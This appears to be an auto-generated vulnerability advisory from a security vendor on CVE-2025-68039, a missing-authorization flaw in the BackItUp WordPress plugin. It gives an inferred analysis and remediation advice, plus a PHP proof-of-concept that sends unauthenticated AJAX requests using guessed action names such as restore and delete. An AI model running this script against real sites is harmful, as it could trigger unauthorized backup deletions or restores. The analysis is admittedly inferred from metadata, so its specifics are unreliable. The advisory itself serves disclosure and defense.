Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-68039: BackItUp <= 2.1.0 – Missing Authorization (wp-backitup)

CVE ID CVE-2025-68039
Plugin wp-backitup
Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 2.1.0
Patched Version
Disclosed January 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68039 (metadata-based):
This vulnerability is a Missing Authorization flaw in the BackItUp WordPress plugin, affecting versions up to and including 2.1.0. The flaw allows unauthenticated attackers to trigger a privileged backend function, leading to unauthorized actions.

Atomic Edge research identifies the root cause as a missing capability check on a WordPress hook handler. The CWE-862 classification confirms the plugin fails to verify a user’s permission level before executing a function. Without access to the source code, this conclusion is inferred from the CWE and the standard WordPress plugin pattern where AJAX or admin-post endpoints register callback functions. The vulnerability likely involves a function registered via `add_action` for `wp_ajax_nopriv_`, `admin_post_nopriv_`, or a REST API route without proper `permission_callback`.

Exploitation requires sending a crafted HTTP request to the vulnerable endpoint. Based on WordPress plugin conventions and the plugin slug ‘wp-backitup’, the most probable attack vector is the WordPress AJAX handler. An attacker would send a POST request to `/wp-admin/admin-ajax.php` with an `action` parameter containing a value like `wp_backitup_` or `backitup_` followed by a specific action name. The exact action name is unknown, but common plugin actions include ‘run_backup’, ‘restore’, or ‘delete_log’. The payload would contain any parameters the vulnerable function expects.

Remediation requires adding a proper authorization check. The patched version must implement a capability check, such as `current_user_can(‘manage_options’)` or a plugin-specific capability, within the callback function. For REST API endpoints, a valid `permission_callback` function must be defined. For AJAX handlers, the function should be registered only under the authenticated `wp_ajax_` hook, not the `wp_ajax_nopriv_` hook, unless the action is intentionally public.

The direct impact is an unauthorized action performed by an unauthenticated attacker. The CVSS vector indicates a low impact on integrity (I:L) with no effect on confidentiality or availability. The specific action is not detailed, but in a backup plugin context, potential impacts include triggering resource-intensive backup or restore operations, deleting backup files or logs, or modifying plugin settings. This could lead to service disruption, data loss, or unauthorized configuration changes.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-68039 - BackItUp <= 2.1.0 - Missing Authorization
<?php
/**
 * Proof of Concept for CVE-2025-68039.
 * This script attempts to trigger an unauthorized action in the BackItUp plugin.
 * The exact AJAX action name is unknown and must be inferred or discovered.
 * Common candidates are tested based on plugin functionality.
 */

$target_url = 'http://target-site.com/wp-admin/admin-ajax.php'; // CHANGE THIS

// Common action prefixes and suffixes for the 'wp-backitup' plugin
$action_candidates = [
    'wp_backitup_run_backup',
    'backitup_run_backup',
    'wp_backitup_restore',
    'backitup_restore',
    'wp_backitup_delete',
    'backitup_delete',
    'wp_backitup_cleanup',
    'backitup_cleanup',
    'wp_backitup_get_log',
    'backitup_get_log'
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);

foreach ($action_candidates as $action) {
    $post_data = ['action' => $action];
    // Some actions may require additional parameters; a minimal payload is used.
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    echo "[*] Testing action: {$action}n";
    echo "    HTTP Code: {$http_code}n";
    // A successful trigger may return a 200 with plugin-specific JSON or message.
    // A failure may return 0, 403, or a WordPress error.
    if ($http_code == 200 && !empty($response)) {
        echo "    Response (first 200 chars): " . substr($response, 0, 200) . "n";
        if (strpos($response, 'success') !== false || strpos($response, 'backup') !== false) {
            echo "[!] POTENTIAL HIT for action: {$action}n";
        }
    }
    echo "n";
}

curl_close($ch);
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School